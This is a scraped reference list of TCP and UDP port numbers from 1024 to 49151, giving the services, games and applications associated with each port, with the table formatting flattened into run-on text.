Unofficial BackupExec Unofficial Webmin, Web-based Unix/Linux system administration tool (default port) 10000–20000 No Unofficial Used on VoIP networks for receiving and transmitting voice telephony traffic which includes Google Voice via the OBiTalk ATA devices as well as on the MagicJack and Vonage ATA network devices.[342] 10001 Unofficial Ubiquiti UniFi access points broadcast to 255.255.255.255:10001 (UDP) to locate the controller(s) 10009 Unofficial Unofficial Crossfire, a multiplayer online First Person Shooter[citation needed] 10011 Unofficial No TeamSpeak 3 ServerQuery[340] 10022 Unofficial No TeamSpeak 3 ServerQuery over SSH 10024 Unofficial Zimbra smtp [mta]—to amavis from postfix[citation needed] 10025 Unofficial Zimbra smtp [mta]—back to postfix from amavis[citation needed] 10042 Unofficial Mathoid server [343] 10050 Yes Zabbix agent 10051 Yes Zabbix trapper 10110 Yes NMEA 0183 Navigational Data. Transport of NMEA 0183 sentences over TCP or UDP 10172 Unofficial Intuit Quickbooks client 10200 Unofficial FRISK Software International’s fpscand virus scanning daemon for Unix platforms[344] Unofficial FRISK Software International’s f-protd virus scanning daemon for Unix platforms[345] 10201–10204 Unofficial FRISK Software International’s f-protd virus scanning daemon for Unix platforms[345] 10212 Yes GE Intelligent Platforms Proficy HMI/SCADA – CIMPLICITY WebView[346] 10308 Unofficial Digital Combat Simulator Dedicated Server [347] 10468 Unofficial Flyer — discovery protocol[citation needed] 10480 Unofficial SWAT 4 Dedicated Server[citation needed] 10505 Unofficial BlueStacks (android simulator) broadcast[348] 10514 Unofficial Unofficial TLS-enabled Rsyslog (default by convention) 10578 Unofficial No Skyrim Together multiplayer server for The Elder Scrolls V: Skyrim mod. 10800 Unofficial Touhou fight games (Immaterial and Missing Power, Scarlet Weather Rhapsody, Hisoutensoku, Hopeless Masquerade and Urban Legend in Limbo) 10823 Unofficial Farming Simulator 2011[citation needed] 10891 Unofficial Jungle Disk (this port is opened by the Jungle Disk Monitor service on the localhost)[citation needed] 10933 Yes No Octopus Deploy Tentacle deployment agent[349] 11001 Yes metasys ( Johnson Controls Metasys java AC control environment ) 11100 No Unofficial Risk of Rain multiplayer server 11111 Unofficial RiCcI, Remote Configuration Interface (Redhat Linux) 11112 Yes ACR/NEMA Digital Imaging and Communications in Medicine (DICOM) 11211 Unofficial Unofficial memcached[11] 11214 Unofficial Unofficial memcached incoming SSL proxy 11215 Unofficial Unofficial memcached internal outgoing SSL proxy 11235 Yes XCOMPUTE numerical systems messaging (Xplicit Computing)[350] 11311 Unofficial Unofficial Robot Operating System master 11371 Yes OpenPGP HTTP key server 11753 Unofficial OpenRCT2 multiplayer[351] 12000 Unofficial Unofficial CubeForm, Multiplayer SandBox Game 12012 Unofficial Audition Online Dance Battle, Korea Server—Status/Version Check 12013 Unofficial Unofficial Audition Online Dance Battle, Korea Server 12035 Unofficial Second Life, used for server UDP in-bound[352] 12043 Unofficial Second Life, used for LSL HTTPS in-bound[353] 12046 Unofficial Second Life, used for LSL HTTP in-bound[353] 12201 Unofficial Unofficial Graylog Extended Log Format (GELF)[354][importance?] 12222 Yes Light Weight Access Point Protocol (LWAPP) LWAPP data (RFC 5412) 12223 Yes Light Weight Access Point Protocol (LWAPP) LWAPP control (RFC 5412) 12307 Unofficial Makerbot UDP Broadcast (client to printer) (JSON-RPC)[355] 12308 Unofficial Makerbot UDP Broadcast (printer to client) (JSON-RPC)[355] 12345 Unofficial Unofficial Cube World[356] Unofficial Little Fighter 2 Unofficial NetBus remote administration tool (often Trojan horse). 12443 Unofficial IBM HMC web browser management access over HTTPS instead of default port 443[357] 12489 Unofficial NSClient/NSClient++/NC_Net (Nagios) 12975 Unofficial LogMeIn Hamachi (VPN tunnel software; also port 32976)—used to connect to Mediation Server (bibi.hamachi.cc); will attempt to use SSL (TCP port 443) if both 12975 & 32976 fail to connect 13000–13050 Unofficial Second Life, used for server UDP in-bound[358] 13008 Unofficial Unofficial Crossfire, a multiplayer online First Person Shooter[citation needed] 13075 Yes Default[359] for BMC Software Control-M/Enterprise Manager Corba communication, though often changed during installation 13400 Yes ISO 13400 Road vehicles — Diagnostic communication over Internet Protocol(DoIP) 13720 Yes Symantec NetBackup—bprd (formerly VERITAS) 13721 Yes Symantec NetBackup—bpdbm (formerly VERITAS) 13724 Yes Symantec Network Utility—vnetd (formerly VERITAS) 13782 Yes Symantec NetBackup—bpcd (formerly VERITAS) 13783 Yes Symantec VOPIED protocol (formerly VERITAS) 13785 Yes Symantec NetBackup Database—nbdb (formerly VERITAS) 13786 Yes Symantec nomdb (formerly VERITAS) 14550 Unofficial MAVLink Ground Station Port 14567 Unofficial Battlefield 1942 and mods 14652 Unofficial Repgen DoxBox reporting tool 14800 Unofficial Age of Wonders III p2p port[360] 15000 Unofficial psyBNC Unofficial Wesnoth Unofficial Kaspersky Network Agent[361] Unofficial Teltonika networks remote management system (RMS) 15009 Unofficial Unofficial Teltonika networks remote management system (RMS) 15010 Unofficial Unofficial Teltonika networks remote management system (RMS) 15441 Unofficial ZeroNet fileserver[citation needed] 15567 Unofficial Battlefield Vietnam and mods 15345 Yes XPilot Contact 15672 Unofficial No RabbitMQ management plugin[362] 16000 Unofficial Oracle WebCenter Content: Imaging (formerly known as Oracle Universal Content Management). Port though often changed during installation Unofficial shroudBNC 16080 Unofficial macOS Server Web (HTTP) service with performance cache[363] 16200 Unofficial Oracle WebCenter Content: Content Server (formerly known as Oracle Universal Content Management). Port though often changed during installation 16225 Unofficial Oracle WebCenter Content: Content Server Web UI. Port though often changed during installation 16250 Unofficial Oracle WebCenter Content: Inbound Refinery (formerly known as Oracle Universal Content Management). Port though often changed during installation 16261 Unofficial Unofficial Project Zomboid multiplayer. Additional sequential ports used for each player connecting to server.[citation needed] 16300 Unofficial Oracle WebCenter Content: Records Management (formerly known as Oracle Universal Records Management). Port though often changed during installation 16384 Unofficial CISCO Default RTP MIN 16384–16403 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s iChat for audio and video[11] 16384–16387 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s FaceTime and Game Center[11] 16393–16402 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s FaceTime and Game Center[11] 16403–16472 Unofficial Real-time Transport Protocol (RTP), RTP Control Protocol (RTCP), used by Apple’s Game Center[11] 16400 Unofficial Oracle WebCenter Content: Capture (formerly known as Oracle Document Capture). Port though often changed during installation 16567 Unofficial Battlefield 2 and mods 16666 Unofficial Unofficial SITC Port for mobile web traffic 16677 Unofficial Unofficial SITC Port for mobile web traffic 17000 Unofficial M17 — Digital RF voice and data protocol with Internet (UDP) gateways (reflectors).[364] 17011 Unofficial Worms multiplayer 17224 Yes Train Realtime Data Protocol (TRDP) Process Data, network protocol used in train communication.[2][365] 17225 Yes Train Realtime Data Protocol (TRDP) Message Data, network protocol used in train communication.[2][366] 17333 Unofficial CS Server (CSMS), default binary protocol port 17472 Yes Tanium Communication Port 17474 Unofficial DMXControl 3 Network Discovery 17475 Unofficial Unofficial DMXControl 3 Network Broker 17500 Yes Dropbox LanSync Protocol (db-lsp); used to synchronize file catalogs between Dropbox clients on a local network. 17777 Unofficial Unofficial SITC Port for mobile web traffic 18080 Unofficial No Monero P2P network communications[citation needed] 18081 Unofficial No Monero incoming RPC calls[citation needed] 18091 Unofficial Unofficial memcached Internal REST HTTPS for SSL 18092 Unofficial Unofficial memcached Internal CAPI HTTPS for SSL 18104 Yes RAD PDF Service 18200 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server status/version check 18201 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server 18206 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft Thailand Server FAM database 18300 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server status/version check 18301 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server 18306 Unofficial Unofficial Audition Online Dance Battle, AsiaSoft SEA Server FAM database 18333 Unofficial Bitcoin testnet[303] 18400 Unofficial Unofficial Audition Online Dance Battle, KAIZEN Brazil Server status/version check 18401 Unofficial Unofficial Audition Online Dance Battle, KAIZEN Brazil Server 18505 Unofficial Unofficial Audition Online Dance Battle R4p3 Server, Nexon Server status/version check 18506 Unofficial Unofficial Audition Online Dance Battle, Nexon Server 18605 Unofficial Unofficial X-BEAT status/version check 18606 Unofficial Unofficial X-BEAT 18676 Unofficial Unofficial YouView 19000 Unofficial Unofficial Audition Online Dance Battle, G10/alaplaya Server status/version check Unofficial JACK sound server 19001 Unofficial Unofficial Audition Online Dance Battle, G10/alaplaya Server 19132 Unofficial Minecraft: Bedrock Edition multiplayer server[367] 19133 Unofficial Minecraft: Bedrock Edition IPv6 multiplayer server[367] 19150 Unofficial Unofficial Gkrellm Server 19226 Unofficial Panda Software AdminSecure Communication Agent 19294 Unofficial Google Talk Voice and Video connections[368] 19295 Unofficial Google Talk Voice and Video connections[368] 19302 Unofficial Google Talk Voice and Video connections[368] 19531 Unofficial No systemd-journal-gatewayd[369] 19532 Unofficial No systemd-journal-remote[370] 19788 No Yes Mesh Link Establishment protocol for IEEE 802.15.4 radio mesh networks[371] 19812 Yes No 4D database SQL Communication[372] 19813 Yes 4D database Client Server Communication[372] 19814 Yes 4D database DB4D Communication[372] 19999 Yes Distributed Network Protocol—Secure (DNP—Secure), a secure version of the protocol used in SCADA systems between communicating RTU’s and IED’s 20000 Yes Distributed Network Protocol (DNP), a protocol used in SCADA systems between communicating RTU’s and IED’s Yes OpenWebNet, communications protocol used in Bticino products Unofficial Usermin, Web-based Unix/Linux user administration tool (default port) Unofficial Used on VoIP networks for receiving and transmitting voice telephony traffic which includes Google Voice via the OBiTalk ATA devices as well as on the MagicJack and Vonage ATA network devices.[342] 20560 Unofficial Unofficial Killing Floor 20582 Unofficial HW Development IoT comms 20583 Unofficial HW Development IoT comms 20595 Unofficial 0 A.D. Empires Ascendant 20808 Unofficial Ableton Link 21025 Unofficial Starbound Server (default), Starbound 21064 Unofficial Default Ingres DBMS server 22000 Unofficial Syncthing (default) 22136 Unofficial FLIR Systems Camera Resource Protocol 22222 Unofficial Davis Instruments, WeatherLink IP 23073 Unofficial Soldat Dedicated Server 23399 Unofficial Skype default protocol 23513 Unofficial Duke Nukem 3D source ports 24441 Unofficial Unofficial Pyzor spam detection network 24444 Unofficial NetBeans integrated development environment 24465 Yes Tonido Directory Server for Tonido which is a Personal Web App and P2P platform 24554 Yes BINKP, Fidonet mail transfers over TCP/IP 24800 Unofficial Synergy: keyboard/mouse sharing software 24842 Unofficial StepMania: Online: Dance Dance Revolution Simulator 25565 Unofficial Minecraft (Java Edition) multiplayer server[373][374] Unofficial Minecraft (Java Edition) multiplayer server query[375] 25575 Unofficial Minecraft (Java Edition) multiplayer server RCON[376] 25600-25700 Unofficial Unofficial SamsidParty Operational Ports 25734-25735 Unofficial Unofficial SOLIDWORKS SolidNetworkLicense Manager[377] 25826 Unofficial collectd default port[378] 26000 Yes Yes id Software’s Quake server Unofficial EVE Online Unofficial Xonotic, an open-source arena shooter 26822 Unofficial MSI MysticLight 26900–26901 Unofficial EVE Online 26909–26911 Unofficial Action Tanks Online 27000 Unofficial PowerBuilder SySAM license server 27000–27006 Unofficial id Software’s QuakeWorld master server 27000–27009 Yes Yes FlexNet Publisher’s License server (from the range of default ports) 27000–27015 No Unofficial Steam (game client traffic)[379] 27015 No Unofficial GoldSrc and Source engine dedicated server port[379] 27015–27018 Unofficial Unturned, a survival game 27015–27030 No Unofficial Steam (matchmaking and HLTV)[379] Unofficial Unofficial Steam (downloads)[379] 27016 Unofficial Magicka and Space Engineers server port 27017 Unofficial No MongoDB daemon process (mongod) and routing service (mongos)[380] 27031–27035 No Unofficial Steam (In-Home Streaming)[379] 27036 Unofficial Unofficial Steam (In-Home Streaming)[379] 27374 Unofficial Sub7 default. 27500–27900 Unofficial id Software’s QuakeWorld 27888 Unofficial Kaillera server 27901–27910 Unofficial id Software’s Quake II master server 27950 Unofficial OpenArena outgoing 27960–27969 Unofficial Activision’s Enemy Territory and id Software’s Quake III Arena, Quake III and Quake Live and some ioquake3 derived games, such as Urban Terror (OpenArena incoming) 28000 Yes Yes Siemens Digital Industries Software license server[2] 28001 Unofficial Starsiege: Tribes[citation needed] 28015 Unofficial Rust (video game)[381] 28016 Unofficial Rust (video game) RCON[382] 28260 Unofficial Palo Alto Networks’ Panorama HA-1 backup unencrypted sync port.[26] 28443 Unofficial Palo Alto Networks’ Panorama-to-managed devices software updates, PAN-OS 8.0 and later.[197] 28769 Unofficial Palo Alto Networks’ Panorama HA unencrypted sync port.[26] 28770 Unofficial Palo Alto Networks’ Panorama HA-1 backup sync port.[26] 28770–28771 Unofficial AssaultCube Reloaded, a video game based upon a modification of AssaultCube[citation needed] 28785–28786 Unofficial Cube 2: Sauerbraten[383] 28852 Unofficial Unofficial Killing Floor[citation needed] 28910 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 28960 Unofficial Unofficial Call of Duty; Call of Duty: United Offensive; Call of Duty 2; Call of Duty 4: Modern Warfare[citation needed] Call of Duty: World at War (PC platform)[385] 29000 Unofficial Perfect World, an adventure and fantasy MMORPG[citation needed] 29070 Unofficial Unofficial Jedi Knight: Jedi Academy by Ravensoft[citation needed] 29900–29901 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 29920 Unofficial Unofficial Nintendo Wi-Fi Connection[384] 30000 Unofficial XLink Kai P2P Unofficial Minetest server default port[386] Unofficial Foundry Virtual Tabletop server default port[387] 30033 Unofficial No TeamSpeak 3 File Transfer[340] 30120 Unofficial Fivem (Default Port) GTA V multiplayer[388][374] 30564 Unofficial Multiplicity: keyboard/mouse/clipboard sharing software[citation needed] 31337 Unofficial Back Orifice and Back Orifice 2000 remote administration tools[389][390] Unofficial Unofficial ncat, a netcat alternative[391] 31416 Unofficial BOINC RPC[392] 31438 Unofficial Rocket U2[393] 31457 Yes TetriNET 32137 Unofficial Unofficial Immunet Protect (UDP in version 2.0,[394] TCP since version 3.0[395]) 32400 Yes Plex Media Server[396] 32764 Unofficial A backdoor found on certain Linksys, Netgear and other wireless DSL modems/combination routers[397] 32887 Unofficial Ace of Spades, a multiplayer FPS video game[citation needed] 32976 Unofficial LogMeIn Hamachi, a VPN application; also TCP port 12975 and SSL (TCP 443).[398] 33434 Yes Yes traceroute 33848 Unofficial Jenkins, a continuous integration (CI) tool[399][400] 34000 Unofficial Infestation: Survivor Stories (formerly known as The War Z), a multiplayer zombie video game[verification needed] 34197 No Unofficial Factorio, a multiplayer survival and factory-building game[401] 35357 Yes OpenStack Identity (Keystone) administration[402][self-published source?] 36330 Unofficial Folding@home Control Port 37008 Unofficial TZSP intrusion detection[citation needed] 40000 Yes Yes SafetyNET p – a real-time Industrial Ethernet protocol 41121 Yes Yes Tentacle Server[403] — Pandora FMS 41794 Yes Yes Crestron Control Port[404] — Crestron Electronics 41795 Yes Yes Crestron Terminal Port[405] — Crestron Electronics 41796 Yes No Crestron Secure Control Port[406] — Crestron Electronics 41797 Yes No Crestron Secure Terminal Port[407] — Crestron Electronics 42081-42090 Yes Yes Zippin — Zippin Stores 42590-42595 Yes Yes Glue — MakePro X 42806 Discord[408] 42999 Yes Curiosity [409] 43110 Unofficial ZeroNet web UI default port [410] 43594–43595 Unofficial RuneScape[411] 44405 Unofficial Mu Online Connect Server[citation needed] 44818 Yes Yes EtherNet/IP explicit messaging 47808–47823 Yes Yes BACnet Building Automation and Control Networks (4780810 = BAC016 to 4782310 = BACF16) 48556 Yes Yes drive.web AC/DC Drive Automation and Control Networks [412] 49151 Reserved Reserved Reserved[2]
Port TCP UDP SCTP DCCP Description 1024 Reserved Reserved Reserved 1025 Yes Yes Teradata database management system (Teradata) server 1027 Reserved Reserved Yes Native IPv6 behind IPv4-to-IPv4 NAT Customer Premises Equipment (6a44)[121] 1028 Reserved[2] 1029 Unofficial Microsoft DCOM services 1058 Yes Yes nim, IBM AIX Network Installation Manager (NIM) 1059 Yes Yes nimreg, IBM AIX Network Installation Manager (NIM) 1080 Yes Yes SOCKS proxy 1085 Yes Yes WebObjects[11] 1098 Yes Yes rmiactivation, Java remote method invocation (RMI) activation 1099 Yes Assigned rmiregistry, Java remote method invocation (RMI) registry 1109 Reserved Reserved Reserved 1113 Assigned
[note 2][122] Yes[123] Licklider Transmission Protocol (LTP) delay tolerant networking protocol 1119 Yes Yes Battle.net chat/game protocol, used by Blizzard’s games[124] 1167 Yes Yes Yes Cisco IP SLA (Service Assurance Agent) 1194 Yes Yes OpenVPN 1198 Yes Yes The cajo project Free dynamic transparent distributed computing in Java 1212 Unofficial Unofficial Equalsocial Fediverse protocol 1214 Yes Yes Kazaa 1220 Yes Assigned QuickTime Streaming Server administration[11] 1234 Yes Yes Infoseek search agent Unofficial VLC media player default port for UDP/RTP stream 1241 Unofficial Unofficial Nessus Security Scanner 1270 Yes Yes Microsoft System Center Operations Manager (SCOM) (formerly Microsoft Operations Manager (MOM)) agent 1293 Yes Yes Internet Protocol Security (IPSec) 1311 Yes Yes Windows RxMon.exe Unofficial Dell OpenManage HTTPS[125] 1314 Unofficial Festival Speech Synthesis System server[126] 1319 Yes Yes AMX ICSP (Protocol for communications with AMX control systems devices) 1337 Yes Yes Men&Mice DNS[127] Unofficial Strapi[128] Unofficial Sails.js default port[129] 1341 Yes Yes Qubes (Manufacturing Execution System) 1344 Yes Yes Internet Content Adaptation Protocol 1352 Yes Yes IBM Lotus Notes/Domino (RPC) protocol 1360 Yes Yes Mimer SQL 1414 Yes Yes IBM WebSphere MQ (formerly known as MQSeries) 1417 Yes Yes Timbuktu Service 1 Port 1418 Yes Yes Timbuktu Service 2 Port 1419 Yes Yes Timbuktu Service 3 Port 1420 Yes Yes Timbuktu Service 4 Port 1431 Yes Reverse Gossip Transport Protocol (RGTP), used to access a General-purpose Reverse-Ordered Gossip Gathering System (GROGGS) bulletin board, such as that implemented on the Cambridge University’s Phoenix system 1433 Yes Yes Microsoft SQL Server database management system (MSSQL) server 1434 Yes Yes Microsoft SQL Server database management system (MSSQL) monitor 1476 Yes Yes WiFi Pineapple Hak5. 1481 Yes Yes AIRS data interchange. 1492 Unofficial Sid Meier’s CivNet, a multiplayer remake of the original Sid Meier’s Civilization game[citation needed] 1494 Unofficial Unofficial Citrix Independent Computing Architecture (ICA)[130] 1500 Unofficial IBM Tivoli Storage Manager server[131] 1501 Unofficial IBM Tivoli Storage Manager client scheduler[131] 1503 Unofficial Unofficial Windows Live Messenger (Whiteboard and Application Sharing)[132] 1512 Yes Yes Microsoft’s Windows Internet Name Service (WINS) 1513 Unofficial Unofficial Garena game client[citation needed] 1521 Yes Yes nCUBE License Manager Unofficial Oracle database default listener, in future releases[when?][133] official port 2483 (TCP/IP) and 2484 (TCP/IP with SSL) 1524 Yes Yes ingreslock, ingres 1527 Yes Yes Oracle Net Services, formerly known as SQL*Net[134] Unofficial Apache Derby Network Server[135] 1533 Yes Yes IBM Sametime Virtual Places Chat 1534 No Unofficial Eclipse Target Communication Framework[136] 1540 Unofficial Unofficial 1C:Enterprise server agent (ragent)[137][138] 1541 Unofficial Unofficial 1C:Enterprise master cluster manager (rmngr)[137] 1542 Unofficial Unofficial 1C:Enterprise configuration repository server[137] 1545 Unofficial Unofficial 1C:Enterprise cluster administration server (RAS)[137] 1547 Yes Yes Laplink 1550 Unofficial Unofficial 1C:Enterprise debug server[137] Unofficial Gadu-Gadu (direct client-to-client)[citation needed] 1560–1590 Unofficial Unofficial 1C:Enterprise cluster working processes[137] 1581 Yes Yes MIL STD 2045-47001 VMF Unofficial IBM Tivoli Storage Manager web client[131] 1582–1583 Unofficial IBM Tivoli Storage Manager server web interface[131] 1583 Unofficial Pervasive PSQL[139] 1589 Yes Yes Cisco VLAN Query Protocol (VQP) 1604 Unofficial Unofficial DarkComet remote administration tool (RAT)[citation needed] 1626 Unofficial iSketch[140] 1627 Unofficial iSketch[140] 1628 Yes Yes LonTalk normal 1629 Yes Yes LonTalk urgent 1645 No Unofficial Early deployment of RADIUS before RFC standardization was done using UDP port number 1645. Enabled for compatibility reasons by default on Cisco[citation needed] and Juniper Networks RADIUS servers.[141] Official port is 1812. TCP port 1645 must not be used.[142] 1646 No Unofficial Old radacct port,[when?] RADIUS accounting protocol. Enabled for compatibility reasons by default on Cisco[citation needed] and Juniper Networks RADIUS servers.[141] Official port is 1813. TCP port 1646 must not be used.[142] 1666 Unofficial Perforce[143] 1677 Yes Yes Novell GroupWise clients in client/server access mode 1688 Unofficial Microsoft Key Management Service (KMS) for Windows Activation[144] 1701 Yes Yes Layer 2 Forwarding Protocol (L2F) Assigned Yes Layer 2 Tunneling Protocol (L2TP)[11] 1707 Yes Yes Windward Studios games (vdmplay) Unofficial L2TP/IPsec, for establish an initial connection[145] 1714–1764 Unofficial Unofficial KDE Connect[146] 1716 Unofficial America’s Army, a massively multiplayer online game (MMO)[147] 1719 Yes Yes H.323 registration and alternate communication 1720 Yes Yes H.323 call signaling 1723 Yes Assigned Point-to-Point Tunneling Protocol (PPTP)[11] 1755 Yes Yes Microsoft Media Services (MMS, ms-streaming) 1761 Unofficial Unofficial Novell ZENworks[148][149] 1776 Yes Emergency management information system 1783 Reserved «Decomissioned [sic] Port 04/14/00, ms»[2] 1801 Yes Yes Microsoft Message Queuing 1812 Yes Yes RADIUS authentication protocol, radius 1813 Yes Yes RADIUS accounting protocol, radius-acct 1863 Yes Yes Microsoft Notification Protocol (MSNP), used by the Microsoft Messenger service and a number of instant messaging Messenger clients 1880 Unofficial Node-RED[150] 1883 Yes Yes MQTT (formerly MQ Telemetry Transport) 1900 Assigned Yes Simple Service Discovery Protocol (SSDP),[11] discovery of UPnP devices 1935 Yes Yes Macromedia Flash Communications Server MX, the precursor to Adobe Flash Media Server before Macromedia’s acquisition by Adobe on December 3, 2005 Unofficial Unofficial Real Time Messaging Protocol (RTMP)[citation needed], primarily used in Adobe Flash[151] 1965 Unofficial No Gemini, a lightweight, collaboratively designed protocol, striving to fill the gap between Gopher and HTTP[152] 1967 Unofficial Cisco IOS IP Service Level Agreements (IP SLAs) Control Protocol[citation needed] 1972 Yes Yes InterSystems Caché, and InterSystems IRIS versions 2020.3 and later 1984 Yes Yes Big Brother 1985 Assigned Yes Cisco Hot Standby Router Protocol (HSRP)[153][self-published source] 1998 Yes Yes Cisco X.25 over TCP (XOT) service 2000 Yes Yes Cisco Skinny Client Control Protocol (SCCP) 2010 Unofficial Artemis: Spaceship Bridge Simulator[154] 2033 Unofficial Unofficial Civilization IV multiplayer[155] 2049 Yes Yes Yes Network File System (NFS)[11] 2056 Unofficial Unofficial Civilization IV multiplayer[155] 2080 Yes Yes Autodesk NLM (FLEXlm) 2082 Unofficial cPanel default[156] 2083 Yes Yes Secure RADIUS Service (radsec) Unofficial cPanel default SSL[156] 2086 Yes Yes GNUnet Unofficial WebHost Manager default[156] 2087 Unofficial WebHost Manager default SSL[156] 2095 Yes cPanel default web mail[156] 2096 Unofficial cPanel default SSL web mail[156] 2100 Unofficial Warzone 2100 multiplayer[citation needed] 2101 Unofficial Networked Transport of RTCM via Internet Protocol (NTRIP)[citation needed] 2102 Yes Yes Zephyr Notification Service server 2103 Yes Yes Zephyr Notification Service serv-hm connection 2104 Yes Yes Zephyr Notification Service hostmanager 2123 Yes Yes GTP control messages (GTP-C) 2142 Yes Yes TDMoIP (TDM over IP) 2152 Yes Yes GTP user data messages (GTP-U) 2159 Yes Yes GDB remote debug port 2181 Yes Yes EForward-document transport system Unofficial Apache ZooKeeper default client port[citation needed] 2195 Unofficial Apple Push Notification Service, binary, gateway.[11][157] Deprecated March 2021.[158] 2196 Unofficial Apple Push Notification Service, binary, feedback.[11][157] Deprecated March 2021.[158] 2197 Unofficial Apple Push Notification Service, HTTP/2, JSON-based API. 2210 Yes Yes NOAAPORT Broadcast Network 2211 Yes Yes EMWIN 2221 Unofficial ESET anti-virus updates[159] 2222 Yes Yes EtherNet/IP implicit messaging for IO data Unofficial DirectAdmin Access[160] 2222–2226 Yes ESET Remote administrator[159] 2240 Yes Yes General Dynamics Remote Encryptor Configuration Information Protocol (RECIPe) 2261 Yes Yes CoMotion master 2262 Yes Yes CoMotion backup 2302 Unofficial ArmA multiplayer[161] Unofficial Halo: Combat Evolved multiplayer host[162] 2303 Unofficial ArmA multiplayer (default port for game +1)[161] Unofficial Halo: Combat Evolved multiplayer listener[162] 2305 Unofficial ArmA multiplayer (default port for game +3)[161] 2351 Unofficial AIM game LAN network port[citation needed] 2368 Unofficial Ghost (blogging platform)[163] 2369 Unofficial Default for BMC Control-M/Server Configuration Agent 2370 Unofficial Default for BMC Control-M/Server, to allow the Control-M/Enterprise Manager to connect to the Control-M/Server 2372 Unofficial Default for K9 Web Protection/parental controls, content filtering agent[citation needed] 2375 Yes Reserved Docker REST API (plain) 2376 Yes Reserved Docker REST API (SSL) 2377 Yes Reserved Docker Swarm cluster management communications[164][self-published source] 2379 Yes Reserved CoreOS etcd client communication Unofficial KGS Go Server[165] 2380 Yes Reserved CoreOS etcd server communication 2389 Assigned OpenView Session Mgr 2399 Yes Yes FileMaker Data Access Layer (ODBC/JDBC) 2401 Yes Yes CVS version control system password-based server 2404 Yes Yes IEC 60870-5-104, used to send electric power telecontrol messages between two systems via directly connected data circuits 2424 Unofficial OrientDB database listening for binary client connections[166] 2427 Yes Yes Media Gateway Control Protocol (MGCP) media gateway 2447 Yes Yes ovwdb—OpenView Network Node Manager (NNM) daemon 2456 Unofficial Unofficial Valheim 2459 Yes Yes XRPL 2480 Unofficial OrientDB database listening for HTTP client connections[166] 2483 Yes Yes Oracle database listening for insecure client connections to the listener, replaces port 1521[when?] 2484 Yes Yes Oracle database listening for SSL client connections to the listener 2500 Unofficial Unofficial NetFS communication[167] 2501 Unofficial NetFS probe 2535 Yes Yes Multicast Address Dynamic Client Allocation Protocol (MADCAP).[168] All standard messages are UDP datagrams.[169] 2541 Yes Yes LonTalk/IP 2546–2548 Yes Yes EVault data protection services 2593 Unofficial Unofficial Ultima Online servers[citation needed] 2598 Unofficial Citrix Independent Computing Architecture (ICA) with Session Reliability; port 1494 without session reliability[130] 2599 Unofficial Unofficial Ultima Online servers[citation needed] 2628 Yes Yes DICT[170] 2638 Yes Yes SQL Anywhere database server[171][172] 2710 Unofficial Unofficial XBT Tracker.[173] UDP tracker extension is considered experimental.[174] 2727 Yes Yes Media Gateway Control Protocol (MGCP) media gateway controller (call agent) 2775 Yes Yes Short Message Peer-to-Peer (SMPP)[citation needed] 2809 Yes Yes corbaloc:iiop URL, per the CORBA 3.0.3 specification 2811 Yes Yes gsi ftp, per the GridFTP specification 2827 Unofficial I2P BOB Bridge[175] 2944 Yes Yes Megaco text H.248 2945 Yes Yes Megaco binary (ASN.1) H.248 2947 Yes Yes gpsd, GPS daemon 2948–2949 Yes Yes WAP push Multimedia Messaging Service (MMS) 2967 Yes Yes Symantec System Center agent (SSC-AGENT) 3000 Unofficial Ruby on Rails development default[176] Unofficial Meteor development default[177][failed verification] Unofficial Unofficial Resilio Sync,[178] spun from BitTorrent Sync. Unofficial Create React App, script to create single-page React applications[179] Unofficial Gogs (self-hosted GIT service) [180] Unofficial Grafana[181] 3001 Yes No Honeywell Prowatch[182] 3004 Unofficial iSync[11] 3010 Yes Yes KWS Connector 3020 Yes Yes Common Internet File System (CIFS). See also port 445 for Server Message Block (SMB), a dialect of CIFS. 3050 Yes Yes gds-db (Interbase/Firebird databases) 3052 Yes Yes APC PowerChute Network 3074 Yes Yes Xbox LIVE and Games for Windows – Live 3101 Unofficial BlackBerry Enterprise Server communication protocol[183] 3128 Unofficial No Squid caching web proxy[184] 3225 Yes Yes Fibre Channel over IP (FCIP) 3233 Yes Yes WhiskerControl research control protocol 3260 Yes Yes iSCSI 3268 Yes Yes msft-gc, Microsoft Global Catalog (LDAP service which contains data from Active Directory forests) 3269 Yes Yes msft-gc-ssl, Microsoft Global Catalog over SSL (similar to port 3268, LDAP over SSL) 3283 Yes Yes Net Assistant,[11] a predecessor to Apple Remote Desktop Unofficial Unofficial Apple Remote Desktop 2.0 or later[11] 3290 Unofficial Virtual Air Traffic Simulation (VATSIM) network voice communication[citation needed] 3305 Yes Yes Odette File Transfer Protocol (OFTP) 3306 Yes Assigned MySQL database system[11] 3323 Unofficial Unofficial DECE GEODI Server 3332 Unofficial Thundercloud DataPath Overlay Control 3333 Unofficial Eggdrop, an IRC bot default port[185] Unofficial Network Caller ID server Unofficial CruiseControl.rb[186] Unofficial OpenOCD (gdbserver)[187] 3351 Unofficial Pervasive PSQL[139] 3386 Yes Yes GTP’ 3GPP GSM/UMTS CDR logging protocol 3389 Yes Yes Microsoft Terminal Server (RDP) officially registered as Windows Based Terminal (WBT)[188] 3396 Yes Yes Novell NDPS Printer Agent 3412 Yes Yes xmlBlaster 3423 Yes Xware xTrm Communication Protocol 3424 Yes Xware xTrm Communication Protocol over SSL 3435 Yes Yes Pacom Security User Port 3455 Yes Yes Resource Reservation Protocol (RSVP) 3478 Yes Yes STUN, a protocol for NAT traversal[189] Yes Yes TURN, a protocol for NAT traversal[190] (extension to STUN) Yes Yes STUN Behavior Discovery.[191] See also port 5349. 3479 Unofficial Unofficial PlayStation Network[192] 3480 Unofficial Unofficial PlayStation Network[192] 3483 Yes Slim Devices discovery protocol Yes Slim Devices SlimProto protocol 3493 Yes Yes Network UPS Tools (NUT) 3503 Yes Yes MPLS LSP-echo Port 3516 Yes Yes Smartcard Port 3527 Yes Microsoft Message Queuing 3535 Unofficial SMTP alternate[193] 3544 Yes Teredo tunneling 3551 Yes Yes Apcupsd Information Port [194] 3601 Yes SAP Message Server Port[195] 3632 Yes Assigned Distcc, distributed compiler[11] 3645 Yes Yes Cyc 3659 Yes Yes Apple SASL, used by macOS Server Password 